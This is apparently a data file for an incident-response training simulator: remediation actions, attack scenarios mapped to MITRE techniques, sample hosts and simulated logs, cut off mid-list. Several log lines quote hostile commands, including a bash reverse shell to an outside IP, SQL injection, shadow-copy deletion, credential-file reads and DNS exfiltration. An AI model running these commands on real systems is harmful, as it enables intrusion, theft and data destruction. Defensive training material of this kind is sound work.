// ─── Remediation Actions ─────────────────────────────────────────────────────

export const REMEDIATION_ACTIONS = [
  { id: "isolate_host", label: "Isolate Host", icon: "🔒", category: "Containment", description: "Network-isolate the selected endpoint immediately" },
  { id: "block_ip", label: "Block IP", icon: "🚫", category: "Containment", description: "Block attacker IP at the perimeter firewall" },
  { id: "disable_user", label: "Disable User", icon: "👤", category: "Containment", description: "Disable the compromised AD user account" },
  { id: "reset_password", label: "Reset Password", icon: "🔑", category: "Containment", description: "Force a password reset for the affected account" },
  { id: "kill_process", label: "Kill Process", icon: "⛔", category: "Response", description: "Terminate the identified malicious process" },
  { id: "quarantine_file", label: "Quarantine File", icon: "🧪", category: "Response", description: "Quarantine the malicious file via EDR" },
  { id: "update_fw_rule", label: "Update FW Rule", icon: "🛡️", category: "Response", description: "Push an updated firewall rule to block the attack vector" },
  { id: "remove_persistence", label: "Remove Persistence", icon: "🗑️", category: "Response", description: "Remove registry keys, scheduled tasks, and startup items" },
  { id: "collect_forensics", label: "Collect Forensics", icon: "🔍", category: "Evidence", description: "Collect a full forensic package from the endpoint" },
  { id: "preserve_evidence", label: "Preserve Evidence", icon: "💾", category: "Evidence", description: "Create a verified hash and preserve all artefacts" },
  { id: "start_coc", label: "Start Chain of Custody", icon: "📋", category: "Evidence", description: "Open a formal chain-of-custody log for all evidence" },
  { id: "patch_system", label: "Patch System", icon: "🩹", category: "Remediation", description: "Deploy emergency patches to close exploited vulnerabilities" },
  { id: "restore_backup", label: "Restore Backup", icon: "♻️", category: "Remediation", description: "Restore the affected system from last known good backup" },
  { id: "escalate_ir", label: "Escalate to IR", icon: "📞", category: "Communication", description: "Formally escalate to the Incident Response team" },
  { id: "notify_customer", label: "Notify Customer", icon: "✉️", category: "Communication", description: "Send breach notification per policy" },
  { id: "open_ticket", label: "Open Ticket", icon: "🎫", category: "Documentation", description: "Create an incident tracking ticket in the ITSM system" },
];

// ─── Scenarios ────────────────────────────────────────────────────────────────

export const SCENARIOS = [
  {
    id: "ransomware_outbreak",
    name: "Ransomware Outbreak",
    category: "Malware / Ransomware",
    difficulty: "Advanced",
    duration_min: 45,
    description: "Multiple workstations are encrypting files. Ransom notes have appeared on shared drives. Identify patient zero and contain the spread.",
    mitre: ["T1566", "T1059", "T1486", "T1490", "T1070"],
  },
  {
    id: "phishing_compromise",
    name: "Phishing Compromise",
    category: "Initial Access / Credential Theft",
    difficulty: "Intermediate",
    duration_min: 30,
    description: "A user clicked a phishing link and entered credentials. Suspicious OAuth grants and email forwarding rules were created shortly after.",
    mitre: ["T1566", "T1078", "T1114", "T1098"],
  },
  {
    id: "lateral_movement",
    name: "Lateral Movement",
    category: "Privilege Escalation / Lateral Movement",
    difficulty: "Advanced",
    duration_min: 40,
    description: "An adversary has foothold on a workstation and is moving laterally using Pass-the-Hash and WMI remote execution toward the domain controller.",
    mitre: ["T1550", "T1021", "T1047", "T1078"],
  },
  {
    id: "data_exfiltration",
    name: "Data Exfiltration",
    category: "Exfiltration",
    difficulty: "Intermediate",
    duration_min: 35,
    description: "Large volumes of data are being staged and uploaded to an external cloud storage endpoint. Sensitive customer PII may be at risk.",
    mitre: ["T1041", "T1567", "T1074", "T1048"],
  },
  {
    id: "insider_threat",
    name: "Insider Threat",
    category: "Insider Threat",
    difficulty: "Intermediate",
    duration_min: 30,
    description: "A disgruntled employee is downloading bulk HR records and attempting to disable audit logging before their last day.",
    mitre: ["T1078", "T1070", "T1567", "T1005"],
  },
  {
    id: "web_compromise",
    name: "Web Application Compromise",
    category: "Initial Access / Web",
    difficulty: "Intermediate",
    duration_min: 30,
    description: "Attackers exploited an unpatched web app via SQL injection, uploaded a web shell, and are attempting to pivot to internal systems.",
    mitre: ["T1190", "T1505", "T1059", "T1021"],
  },
  {
    id: "brute_force_vpn",
    name: "Brute Force VPN Attack",
    category: "Credential Access",
    difficulty: "Beginner",
    duration_min: 20,
    description: "Thousands of failed VPN authentication attempts are occurring. One account was recently locked out, then successfully authenticated from an unusual country.",
    mitre: ["T1110", "T1078", "T1133"],
  },
  {
    id: "suspicious_login",
    name: "Suspicious Login Alert",
    category: "Identity / Authentication",
    difficulty: "Beginner",
    duration_min: 15,
    description: "SIEM flagged a user account logging in at 3am from an unrecognized device. Determine if it's legitimate or a compromised credential.",
    mitre: ["T1078", "T1110"],
  },
  {
    id: "malware_usb",
    name: "Malware via USB Drive",
    category: "Malware / Initial Access",
    difficulty: "Beginner",
    duration_min: 15,
    description: "An employee plugged in a personal USB drive. AV detected a suspicious executable. Identify the threat, contain the endpoint, and preserve evidence.",
    mitre: ["T1091", "T1059", "T1204"],
  },
  {
    id: "spam_campaign",
    name: "Spam Email Campaign",
    category: "Email Threat",
    difficulty: "Beginner",
    duration_min: 15,
    description: "A large volume of spam emails with malicious attachments are being received by employees. Identify the sender pattern and block the campaign.",
    mitre: ["T1566", "T1204"],
  },
  {
    id: "password_spray",
    name: "Password Spray Attack",
    category: "Credential Access",
    difficulty: "Beginner",
    duration_min: 15,
    description: "Authentication logs show a single IP trying common passwords across many accounts. Identify the affected accounts and respond before a successful login.",
    mitre: ["T1110.003", "T1078"],
  },
  {
    id: "port_scan",
    name: "External Port Scan",
    category: "Reconnaissance",
    difficulty: "Beginner",
    duration_min: 15,
    description: "The firewall is logging thousands of connection attempts from an external IP probing all open ports. Assess the threat and block appropriately.",
    mitre: ["T1595", "T1046"],
  },
  {
    id: "rogue_wifi",
    name: "Rogue Wi-Fi Access Point",
    category: "Network Threat",
    difficulty: "Beginner",
    duration_min: 20,
    description: "A wireless sensor detected an unauthorized access point broadcasting the corporate SSID. Users may be connecting to it. Locate and neutralize it.",
    mitre: ["T1557", "T1040"],
  },
  {
    id: "account_lockout",
    name: "Mass Account Lockout",
    category: "Denial of Service / Credential Access",
    difficulty: "Beginner",
    duration_min: 15,
    description: "Help desk is being flooded with password reset requests. Dozens of AD accounts locked out in minutes. Identify the source and prevent service disruption.",
    mitre: ["T1110", "T1531"],
  },
  {
    id: "malicious_macro",
    name: "Malicious Office Macro",
    category: "Malware / Execution",
    difficulty: "Beginner",
    duration_min: 20,
    description: "A user opened a Word document and macros ran automatically. PowerShell spawned from winword.exe. Assess scope and contain the threat.",
    mitre: ["T1566.001", "T1059.001", "T1204"],
  },
  {
    id: "dlp_alert",
    name: "DLP Policy Violation",
    category: "Data Loss Prevention",
    difficulty: "Beginner",
    duration_min: 15,
    description: "The DLP system flagged a user emailing a file containing credit card numbers to a personal Gmail address. Investigate and determine if data was leaked.",
    mitre: ["T1048", "T1567"],
  },
  {
    id: "av_detection",
    name: "Antivirus Malware Alert",
    category: "Malware",
    difficulty: "Beginner",
    duration_min: 15,
    description: "Endpoint AV triggered on three workstations detecting Trojan.GenericKD. The quarantine was automatic but the initial infection vector is unknown.",
    mitre: ["T1204", "T1059", "T1070"],
  },
  {
    id: "web_phishing_report",
    name: "User-Reported Phishing Email",
    category: "Email Threat",
    difficulty: "Beginner",
    duration_min: 15,
    description: "An employee reported a suspicious email asking them to log into 'IT Support' via a link. Triage the email, analyze the URL, and determine exposure.",
    mitre: ["T1566", "T1598"],
  },
  {
    id: "unusual_process",
    name: "Unusual Process Execution",
    category: "Malware / Execution",
    difficulty: "Beginner",
    duration_min: 15,
    description: "EDR flagged an unfamiliar executable running from the AppData directory under a standard user account. Investigate the process and its origin.",
    mitre: ["T1204", "T1059", "T1036"],
  },
  {
    id: "dns_anomaly",
    name: "Anomalous DNS Queries",
    category: "Network / C2",
    difficulty: "Beginner",
    duration_min: 15,
    description: "DNS logs show a workstation making hundreds of queries per minute to randomly named subdomains. Possible C2 communication or DGA malware.",
    mitre: ["T1071.004", "T1568"],
  },
  {
    id: "privileged_misuse",
    name: "Privileged Account Misuse",
    category: "Insider Threat",
    difficulty: "Beginner",
    duration_min: 20,
    description: "An admin account was used after business hours to access sensitive financial folders it doesn't normally access. Determine if it's legitimate or abuse.",
    mitre: ["T1078.002", "T1005"],
  },
  {
    id: "rdp_external",
    name: "Exposed RDP Service",
    category: "Initial Access",
    difficulty: "Beginner",
    duration_min: 15,
    description: "A vulnerability scan revealed RDP (port 3389) is exposed directly to the internet on a server. Login attempts from external IPs are being logged.",
    mitre: ["T1133", "T1110", "T1021.001"],
  },
  {
    id: "crypto_miner",
    name: "Cryptominer Detected",
    category: "Malware / Impact",
    difficulty: "Beginner",
    duration_min: 15,
    description: "Server CPU is pegged at 98% and network traffic shows connections to known mining pools. A cryptominer may be running as a system service.",
    mitre: ["T1496", "T1543"],
  },
  {
    id: "fake_helpdesk",
    name: "Fake IT Help Desk Call",
    category: "Social Engineering",
    difficulty: "Beginner",
    duration_min: 15,
    description: "A user received a call from someone claiming to be IT support and provided their credentials. The caller may have gained remote access. Investigate and respond.",
    mitre: ["T1598", "T1078"],
  },
  {
    id: "data_on_pastebin",
    name: "Corporate Data on Pastebin",
    category: "Data Exposure",
    difficulty: "Beginner",
    duration_min: 20,
    description: "Threat intelligence flagged internal employee emails and partial passwords posted to Pastebin. Determine the source of the leak and assess impact.",
    mitre: ["T1552", "T1589"],
  },
  {
    id: "shadow_it",
    name: "Shadow IT Cloud App",
    category: "Policy Violation",
    difficulty: "Beginner",
    duration_min: 15,
    description: "Proxy logs show employees uploading corporate files to an unsanctioned cloud storage app. Investigate scope and enforce data governance policy.",
    mitre: ["T1567", "T1048"],
  },
  {
    id: "ransomware_note_found",
    name: "Ransom Note Discovered",
    category: "Malware / Ransomware",
    difficulty: "Beginner",
    duration_min: 20,
    description: "An employee found a ransom note on a shared network drive but no encryption has been detected yet. Quickly identify if an attacker has foothold and contain before encryption begins.",
    mitre: ["T1486", "T1490", "T1070"],
  },
  {
    id: "cloud_compromise",
    name: "Cloud Account Compromise",
    category: "Cloud / Identity",
    difficulty: "Expert",
    duration_min: 50,
    description: "An IAM credential was leaked in a public GitHub repo. API calls from unknown regions are spinning up compute instances and exfiltrating S3 data.",
    mitre: ["T1552", "T1530", "T1578", "T1136"],
  },
  {
    id: "supply_chain_attack",
    name: "Supply Chain Compromise",
    category: "Initial Access / Supply Chain",
    difficulty: "Expert",
    duration_min: 55,
    description: "A trusted software vendor's update package was backdoored. Endpoints that auto-updated are now beaconing to attacker infrastructure. Scope the compromise and eradicate.",
    mitre: ["T1195", "T1059", "T1071", "T1036"],
  },
  {
    id: "zero_day_exploit",
    name: "Zero-Day Exploit in Production",
    category: "Initial Access / Exploitation",
    difficulty: "Expert",
    duration_min: 50,
    description: "A previously unknown vulnerability in the web application was exploited. Memory corruption indicators and unusual kernel calls detected. Patch is not yet available.",
    mitre: ["T1190", "T1059", "T1068", "T1055"],
  },
  {
    id: "active_directory_attack",
    name: "Active Directory Golden Ticket",
    category: "Privilege Escalation / Persistence",
    difficulty: "Expert",
    duration_min: 50,
    description: "Indicators suggest an attacker forged a Kerberos Golden Ticket using stolen KRBTGT hash. The attacker has persistent domain admin access without valid credentials.",
    mitre: ["T1558.001", "T1003.002", "T1550.003"],
  },
  {
    id: "ot_ics_intrusion",
    name: "OT/ICS Network Intrusion",
    category: "Critical Infrastructure",
    difficulty: "Expert",
    duration_min: 60,
    description: "Anomalous traffic was detected crossing from the IT network into the OT/ICS segment. SCADA engineering workstations are being accessed remotely during off-hours.",
    mitre: ["T0866", "T0816", "T0843", "T1078"],
  },
  {
    id: "multi_stage_apt",
    name: "Multi-Stage APT Campaign",
    category: "Advanced Persistent Threat",
    difficulty: "Expert",
    duration_min: 60,
    description: "A nation-state-level threat actor has been present in the network for an estimated 3 months. Evidence of multiple stages: initial phishing, C2 establishment, credential harvesting, and staged exfiltration.",
    mitre: ["T1566", "T1071", "T1003", "T1074", "T1041"],
  },
  {
    id: "container_escape",
    name: "Container Escape Attack",
    category: "Cloud / Container Security",
    difficulty: "Advanced",
    duration_min: 40,
    description: "A containerized application was exploited and the attacker escaped to the host node. Kubernetes cluster resources are being enumerated and secrets are being accessed.",
    mitre: ["T1610", "T1613", "T1552.007", "T1078"],
  },
  {
    id: "business_email_compromise",
    name: "Business Email Compromise (BEC)",
    category: "Social Engineering / Financial Fraud",
    difficulty: "Intermediate",
    duration_min: 35,
    description: "A CFO's email account was spoofed and wire transfer instructions sent to finance. An employee may have processed a fraudulent payment. Determine scope and contain.",
    mitre: ["T1566", "T1534", "T1114", "T1078"],
  },
  {
    id: "ransomware_double_extortion",
    name: "Double Extortion Ransomware",
    category: "Malware / Ransomware",
    difficulty: "Advanced",
    duration_min: 45,
    description: "Files are encrypted and the attacker claims to have already exfiltrated 200GB of data. They have posted a sample on a dark web leak site as proof. Investigate both vectors.",
    mitre: ["T1486", "T1041", "T1567", "T1490", "T1070"],
  },
  {
    id: "credential_stuffing",
    name: "Credential Stuffing Attack",
    category: "Credential Access",
    difficulty: "Intermediate",
    duration_min: 30,
    description: "Thousands of login attempts from hundreds of IPs are hitting the customer portal using credentials likely sourced from a third-party breach. Multiple accounts show successful logins.",
    mitre: ["T1110.004", "T1078", "T1133"],
  },
  {
    id: "man_in_the_middle",
    name: "Man-in-the-Middle Attack",
    category: "Network / Credential Theft",
    difficulty: "Intermediate",
    duration_min: 35,
    description: "ARP spoofing detected on the internal network segment. A device is intercepting traffic between workstations and the gateway, potentially capturing credentials and session tokens.",
    mitre: ["T1557.002", "T1040", "T1185"],
  },
  {
    id: "fileless_malware",
    name: "Fileless Malware Attack",
    category: "Malware / Execution",
    difficulty: "Advanced",
    duration_min: 40,
    description: "EDR detected malicious activity running entirely in memory — no files dropped to disk. PowerShell and WMI are being abused to maintain persistence and execute payloads.",
    mitre: ["T1059.001", "T1547.001", "T1055", "T1220"],
  },
  {
    id: "kerberoasting",
    name: "Kerberoasting Attack",
    category: "Credential Access",
    difficulty: "Intermediate",
    duration_min: 30,
    description: "Abnormal Kerberos TGS requests detected — a low-privilege account is requesting service tickets for high-value service accounts, likely to crack offline.",
    mitre: ["T1558.003", "T1078", "T1021"],
  },
  {
    id: "siem_evasion",
    name: "Log Evasion and SIEM Bypass",
    category: "Defense Evasion",
    difficulty: "Advanced",
    duration_min: 40,
    description: "An attacker is systematically disabling logging across endpoints, clearing event logs, and tampering with SIEM agent configs to blind the SOC before executing their primary objective.",
    mitre: ["T1070", "T1562", "T1489", "T1036"],
  },
  {
    id: "wiper_malware",
    name: "Wiper Malware Deployment",
    category: "Malware / Destructive",
    difficulty: "Advanced",
    duration_min: 45,
    description: "Destructive malware is overwriting MBRs and deleting files across the environment. Unlike ransomware, no ransom note was left — this appears to be a destructive attack.",
    mitre: ["T1561", "T1485", "T1490", "T1059"],
  },
  {
    id: "oauth_token_theft",
    name: "OAuth Token Theft",
    category: "Identity / Cloud",
    difficulty: "Intermediate",
    duration_min: 30,
    description: "A refresh token was stolen from a developer's machine and is being used to access cloud resources and SaaS applications without triggering MFA prompts.",
    mitre: ["T1528", "T1550.001", "T1078.004", "T1114"],
  },
];

// ─── Endpoints ────────────────────────────────────────────────────────────────

export const ENDPOINTS = [
  { id: "win-ws-01", name: "DESKTOP-WIN01", os: "Windows 10", ip: "10.0.1.10", role: "Workstation", status: "healthy", user: "jsmith" },
  { id: "win-ws-02", name: "DESKTOP-WIN02", os: "Windows 10", ip: "10.0.1.11", role: "Workstation", status: "healthy", user: "mjohnson" },
  { id: "win-srv-01", name: "SERVER-WIN01", os: "Windows Server 2019", ip: "10.0.2.10", role: "File Server", status: "healthy", user: "svcaccount" },
  { id: "dc-01", name: "DC-PRIMARY", os: "Windows Server 2022", ip: "10.0.2.5", role: "Domain Controller", status: "healthy", user: "Administrator" },
  { id: "linux-srv-01", name: "LINUX-APP01", os: "Ubuntu 22.04", ip: "10.0.2.20", role: "App Server", status: "healthy", user: "appuser" },
  { id: "linux-web-01", name: "LINUX-WEB01", os: "Ubuntu 20.04", ip: "10.0.3.10", role: "Web Server", status: "healthy", user: "www-data" },
  { id: "vpn-gw", name: "VPN-GATEWAY", os: "FortiOS 7.2", ip: "203.0.113.1", role: "VPN Gateway", status: "healthy", user: "N/A" },
  { id: "fw-01", name: "FIREWALL-EDGE", os: "Palo Alto PAN-OS", ip: "203.0.113.254", role: "Firewall", status: "healthy", user: "N/A" },
];

// ─── Log Generator ────────────────────────────────────────────────────────────

const LOG_TEMPLATES = {
  ransomware_outbreak: [
    { ts: -42, src: "10.0.1.10", type: "endpoint", sev: "critical", msg: "Mass file rename detected: 847 files renamed with .LOCKED extension in C:\\Users\\jsmith\\Documents" },
    { ts: -40, src: "10.0.1.10", type: "process", sev: "high", msg: "Suspicious process: powershell.exe -enc JAB... executed by jsmith" },
    { ts: -38, src: "10.0.2.10", type: "file", sev: "high", msg: "Ransom note dropped: \\\\SERVER-WIN01\\Share\\RESTORE_FILES.txt" },
    { ts: -35, src: "10.0.1.11", type: "endpoint", sev: "critical", msg: "Encryption activity detected on DESKTOP-WIN02: 1,203 files affected" },
    { ts: -30, src: "10.0.1.10", type: "network", sev: "medium", msg: "Outbound connection to 185.220.101.47:443 (TOR exit node known IOC)" },
    { ts: -28, src: "10.0.2.10", type: "file", sev: "high", msg: "Volume Shadow Copy deletion: vssadmin.exe delete shadows /all /quiet" },
    { ts: -20, src: "10.0.2.5", type: "auth", sev: "medium", msg: "Unusual SMB lateral movement from 10.0.1.10 to DC-PRIMARY" },
    { ts: -15, src: "10.0.1.10", type: "process", sev: "high", msg: "WMI execution: wmic.exe /node:10.0.1.11 process call create cmd.exe" },
    { ts: -10, src: "fw-01", type: "firewall", sev: "high", msg: "Blocked C2 beacon to 185.220.101.47 (ransomware C2 IOC)" },
    { ts: -5, src: "10.0.2.10", type: "endpoint", sev: "critical", msg: "Backup service terminated: net stop backup via cmd.exe" },
  ],
  phishing_compromise: [
    { ts: -55, src: "10.0.1.10", type: "web", sev: "medium", msg: "User jsmith visited phishing URL: http://secure-login-microsoft.xyz/auth" },
    { ts: -53, src: "auth-svc", type: "auth", sev: "high", msg: "OAuth consent granted to unknown app 'DocuSignHelper' by jsmith@company.com" },
    { ts: -50, src: "mail-gw", type: "email", sev: "high", msg: "Email forwarding rule created: ALL mail → external@gmail.com by jsmith" },
    { ts: -45, src: "10.0.1.10", type: "auth", sev: "medium", msg: "Successful login from IP 91.108.4.22 (RU) for jsmith@company.com" },
    { ts: -40, src: "10.0.2.10", type: "file", sev: "medium", msg: "SharePoint bulk download: jsmith accessed 342 files in HR_Confidential in 4 minutes" },
    { ts: -30, src: "auth-svc", type: "auth", sev: "high", msg: "MFA bypass attempt: jsmith authentication from 2 countries simultaneously" },
    { ts: -20, src: "mail-gw", type: "email", sev: "medium", msg: "Phishing email sent from compromised jsmith mailbox to 87 internal recipients" },
    { ts: -10, src: "10.0.1.10", type: "process", sev: "medium", msg: "Browser credential dump attempt detected: chrome.exe reading Login Data" },
  ],
  brute_force_vpn: [
    { ts: -90, src: "vpn-gw", type: "auth", sev: "medium", msg: "Failed VPN auth: user admin from 45.95.147.23 (attempt 1 of 847)" },
    { ts: -85, src: "vpn-gw", type: "auth", sev: "medium", msg: "Failed VPN auth: user mjohnson from 45.95.147.23 (attempt 412)" },
    { ts: -60, src: "vpn-gw", type: "auth", sev: "high", msg: "Account locked: mjohnson after 30 failed attempts in 5 minutes" },
    { ts: -45, src: "vpn-gw", type: "auth", sev: "critical", msg: "SUCCESSFUL VPN auth: mjohnson from 45.95.147.23 (UA, unknown location)" },
    { ts: -40, src: "vpn-gw", type: "network", sev: "high", msg: "VPN session established: mjohnson assigned 10.10.0.55 from Ukraine" },
    { ts: -35, src: "10.10.0.55", type: "network", sev: "high", msg: "Internal network scan detected from VPN IP 10.10.0.55" },
    { ts: -20, src: "10.10.0.55", type: "auth", sev: "high", msg: "SMB enumeration attempt from 10.10.0.55 to all internal hosts" },
    { ts: -10, src: "vpn-gw", type: "network", sev: "medium", msg: "Unusual data transfer: 2.3GB outbound over VPN session mjohnson" },
  ],
  lateral_movement: [
    { ts: -60, src: "10.0.1.10", type: "auth", sev: "high", msg: "Pass-the-Hash detected: NTLM authentication using hash for domain admin from DESKTOP-WIN01" },
    { ts: -55, src: "10.0.1.10", type: "process", sev: "high", msg: "Mimikatz execution pattern detected: lsass.exe memory read by powershell.exe" },
    { ts: -50, src: "10.0.2.5", type: "auth", sev: "critical", msg: "Domain admin account authenticated from workstation 10.0.1.10 (anomalous)" },
    { ts: -45, src: "10.0.1.10", type: "network", sev: "high", msg: "WMI remote execution to 10.0.2.10 (SERVER-WIN01)" },
    { ts: -40, src: "10.0.2.10", type: "process", sev: "high", msg: "Scheduled task created by remote WMI: C:\\Windows\\svchost32.exe" },
    { ts: -30, src: "10.0.2.5", type: "auth", sev: "critical", msg: "DC replication request from non-DC host 10.0.1.10 (DCSync attack)" },
    { ts: -20, src: "10.0.2.5", type: "process", sev: "critical", msg: "NTDS.dit access attempt detected on DC-PRIMARY" },
    { ts: -10, src: "10.0.1.10", type: "network", sev: "high", msg: "Large encrypted outbound transfer to 5.188.206.14:443" },
  ],
  data_exfiltration: [
    { ts: -70, src: "10.0.2.20", type: "file", sev: "medium", msg: "Bulk file access: appuser read 2,847 records from customer_data.db" },
    { ts: -65, src: "10.0.2.20", type: "process", sev: "medium", msg: "Archive creation: 7z.exe a -mhe=on customers_export.7z customer_data/ -p" },
    { ts: -60, src: "10.0.2.20", type: "network", sev: "high", msg: "DNS query to upload.mega.nz resolved from LINUX-APP01" },
    { ts: -55, src: "10.0.2.20", type: "network", sev: "critical", msg: "Data exfiltration: 4.2GB HTTPS upload to mega.nz from 10.0.2.20" },
    { ts: -40, src: "10.0.2.20", type: "process", sev: "medium", msg: "Secure delete: shred -u customers_export.7z executed to cover tracks" },
    { ts: -30, src: "10.0.2.20", type: "file", sev: "high", msg: "Log file cleared: /var/log/auth.log truncated to 0 bytes" },
    { ts: -20, src: "fw-01", type: "firewall", sev: "high", msg: "Allowed outbound 443 to 185.42.116.0/24 (cloud storage range) 47 connections" },
    { ts: -10, src: "10.0.2.20", type: "network", sev: "medium", msg: "Secondary exfil via DNS tunneling detected: long TXT queries to exf.attacker.com" },
  ],
  insider_threat: [
    { ts: -120, src: "10.0.1.11", type: "file", sev: "medium", msg: "Bulk HR file download: mjohnson accessed payroll records outside business hours" },
    { ts: -100, src: "10.0.1.11", type: "process", sev: "high", msg: "Audit log tampering: auditpol.exe /clear executed by mjohnson" },
    { ts: -80, src: "10.0.1.11", type: "file", sev: "high", msg: "USB device connected: 32GB removable drive detected on DESKTOP-WIN02" },
    { ts: -70, src: "10.0.1.11", type: "file", sev: "high", msg: "Data transfer to USB: 1.8GB copied to E:\\ by mjohnson" },
    { ts: -50, src: "10.0.1.11", type: "process", sev: "medium", msg: "Cloud sync client started: Dropbox.exe uploading 847 files" },
    { ts: -30, src: "auth-svc", type: "auth", sev: "medium", msg: "mjohnson attempted to access terminated employee accounts" },
    { ts: -20, src: "10.0.1.11", type: "process", sev: "high", msg: "Browser history cleared and local event logs wiped by mjohnson" },
    { ts: -5, src: "mail-gw", type: "email", sev: "high", msg: "Large email attachment sent externally: mjohnson → personal@gmail.com (23MB)" },
  ],
  web_compromise: [
    { ts: -80, src: "10.0.3.10", type: "web", sev: "high", msg: "SQL injection detected: GET /search?q=1' OR '1'='1 from 91.92.247.18" },
    { ts: -75, src: "10.0.3.10", type: "web", sev: "critical", msg: "Web shell upload: POST /upload/shell.php returned 200 OK" },
    { ts: -70, src: "10.0.3.10", type: "process", sev: "critical", msg: "RCE via web shell: www-data executing id; uname -a; cat /etc/passwd" },
    { ts: -60, src: "10.0.3.10", type: "process", sev: "high", msg: "Reverse shell established: /bin/bash -c 'bash -i >& /dev/tcp/91.92.247.18/4444 0>&1'" },
    { ts: -50, src: "10.0.3.10", type: "process", sev: "high", msg: "Privilege escalation: sudo /usr/bin/python3 -c 'import pty; pty.spawn(\"/bin/bash\")'" },
    { ts: -40, src: "10.0.3.10", type: "network", sev: "high", msg: "Internal network pivot: nmap scan of 10.0.0.0/16 from web server" },
    { ts: -20, src: "10.0.3.10", type: "process", sev: "high", msg: "Credential harvesting: /etc/shadow read attempt by compromised www-data" },
    { ts: -10, src: "fw-01", type: "firewall", sev: "medium", msg: "Outbound reverse shell traffic detected on non-standard port 4444" },
  ],
  cloud_compromise: [
    { ts: -90, src: "github.com", type: "cloud", sev: "high", msg: "AWS credentials exposed in public repo: AKIAIOSFODNN7EXAMPLE found in config.yml" },
    { ts: -80, src: "aws-api", type: "cloud", sev: "critical", msg: "API call from unknown IP 185.176.27.101 (RU): DescribeInstances across all regions" },
    { ts: -70, src: "aws-api", type: "cloud", sev: "critical", msg: "IAM user created: backdoor_admin with AdministratorAccess policy attached" },
    { ts: -60, src: "aws-api", type: "cloud", sev: "high", msg: "EC2 instances launched x12 in eu-west-1: t3.xlarge (cryptocurrency mining suspected)" },
    { ts: -50, src: "aws-api", type: "cloud", sev: "critical", msg: "S3 bucket public ACL set: s3://company-backups made public" },
    { ts: -40, src: "aws-api", type: "cloud", sev: "critical", msg: "S3 GetObject: 47,832 objects downloaded from s3://company-backups by anonymous" },
    { ts: -30, src: "aws-api", type: "cloud", sev: "high", msg: "CloudTrail logging disabled in us-east-1 and eu-west-1 by backdoor_admin" },
    { ts: -15, src: "aws-api", type: "cloud", sev: "high", msg: "Route53 DNS records modified to redirect company.com to attacker-controlled IP" },
  ],
  suspicious_login: [
    { ts: -30, src: "auth-svc", type: "auth", sev: "medium", msg: "Successful login at 03:14 AM: user jsmith from device UNKNOWN-DEVICE-4421" },
    { ts: -28, src: "auth-svc", type: "auth", sev: "high", msg: "Login from unrecognized IP 212.58.244.18 (London, UK) — usual location is Chicago, IL" },
    { ts: -25, src: "10.0.1.10", type: "auth", sev: "medium", msg: "Session established for jsmith — accessing email, SharePoint" },
  ],
  malware_usb: [
    { ts: -20, src: "10.0.1.10", type: "endpoint", sev: "high", msg: "USB device connected: SanDisk Cruzer 16GB (E:\\) on DESKTOP-WIN01 by jsmith" },
    { ts: -18, src: "10.0.1.10", type: "process", sev: "critical", msg: "AV Alert: Trojan.AutoRun detected in E:\\setup.exe — quarantine attempted" },
    { ts: -15, src: "10.0.1.10", type: "process", sev: "high", msg: "Suspicious child process: cmd.exe spawned from explorer.exe after USB insertion" },
  ],
  spam_campaign: [
    { ts: -60, src: "mail-gw", type: "email", sev: "medium", msg: "Spam campaign detected: 340 emails received from domain invoices-payable.xyz" },
    { ts: -55, src: "mail-gw", type: "email", sev: "high", msg: "Malicious attachment flagged: Invoice_March.xlsm (Excel macro-enabled) in 87 mailboxes" },
    { ts: -50, src: "10.0.1.11", type: "process", sev: "high", msg: "User mjohnson opened Invoice_March.xlsm — macro execution detected" },
  ],
  password_spray: [
    { ts: -45, src: "auth-svc", type: "auth", sev: "medium", msg: "Failed login: user admin — password 'Summer2024!' from 91.108.56.180" },
    { ts: -43, src: "auth-svc", type: "auth", sev: "medium", msg: "Failed login: user jsmith — password 'Summer2024!' from 91.108.56.180" },
    { ts: -40, src: "auth-svc", type: "auth", sev: "high", msg: "Password spray pattern detected: same password tried across 47 accounts from single IP" },
    { ts: -30, src: "auth-svc", type: "auth", sev: "critical", msg: "Successful login: user helpdesk01 — password 'Summer2024!' from 91.108.56.180" },
  ],
  port_scan: [
    { ts: -20, src: "fw-01", type: "firewall", sev: "medium", msg: "Port scan detected from 185.234.219.5: 6,500 connection attempts in 60 seconds" },
    { ts: -18, src: "fw-01", type: "firewall", sev: "medium", msg: "Ports probed: 22, 80, 443, 3389, 8080, 8443, 21, 25, 3306, 5432..." },
    { ts: -15, src: "fw-01", type: "firewall", sev: "high", msg: "Open ports confirmed via scan response: 443, 80, 8080 on 203.0.113.254" },
  ],
  rogue_wifi: [
    { ts: -30, src: "wlan-sensor", type: "network", sev: "high", msg: "Rogue AP detected: SSID 'CorpWiFi' broadcasting on channel 6, MAC 00:1A:2B:3C:4D:5E" },
    { ts: -25, src: "wlan-sensor", type: "network", sev: "high", msg: "3 corporate devices connected to rogue AP in last 10 minutes" },
    { ts: -20, src: "wlan-sensor", type: "network", sev: "medium", msg: "Signal strength suggests rogue AP is inside building — floor 2 estimated" },
  ],
  account_lockout: [
    { ts: -10, src: "dc-01", type: "auth", sev: "high", msg: "Account lockout storm: 47 AD accounts locked in 8 minutes" },
    { ts: -8, src: "vpn-gw", type: "auth", sev: "high", msg: "Failed VPN authentications: 1,200 attempts against locked accounts from 91.92.0.0/16" },
    { ts: -5, src: "dc-01", type: "auth", sev: "medium", msg: "Help desk queue: 38 password reset tickets opened in last 5 minutes" },
  ],
  malicious_macro: [
    { ts: -25, src: "10.0.1.10", type: "email", sev: "medium", msg: "User opened: Q1_Report_FINAL.docm received from external sender" },
    { ts: -23, src: "10.0.1.10", type: "process", sev: "critical", msg: "Macro execution: WINWORD.EXE spawned powershell.exe -w hidden -enc SQBFAFgA..." },
    { ts: -20, src: "10.0.1.10", type: "network", sev: "high", msg: "Outbound connection attempt to 185.220.101.5:80 from powershell.exe" },
  ],
  dlp_alert: [
    { ts: -15, src: "mail-gw", type: "email", sev: "high", msg: "DLP Violation: jsmith sent spreadsheet containing 142 credit card numbers to personal@gmail.com" },
    { ts: -13, src: "mail-gw", type: "email", sev: "medium", msg: "Email subject: 'Customer Export Q4' — attachment: customer_data_export.xlsx (2.1MB)" },
    { ts: -10, src: "mail-gw", type: "email", sev: "medium", msg: "Email delivery status: DELIVERED — data may have left organization" },
  ],
  av_detection: [
    { ts: -40, src: "10.0.1.10", type: "endpoint", sev: "high", msg: "AV Alert: Trojan.GenericKD.47821 detected in C:\\Users\\jsmith\\Downloads\\free_tool.exe" },
    { ts: -38, src: "10.0.1.11", type: "endpoint", sev: "high", msg: "AV Alert: Same Trojan.GenericKD detected on DESKTOP-WIN02 — possible lateral spread" },
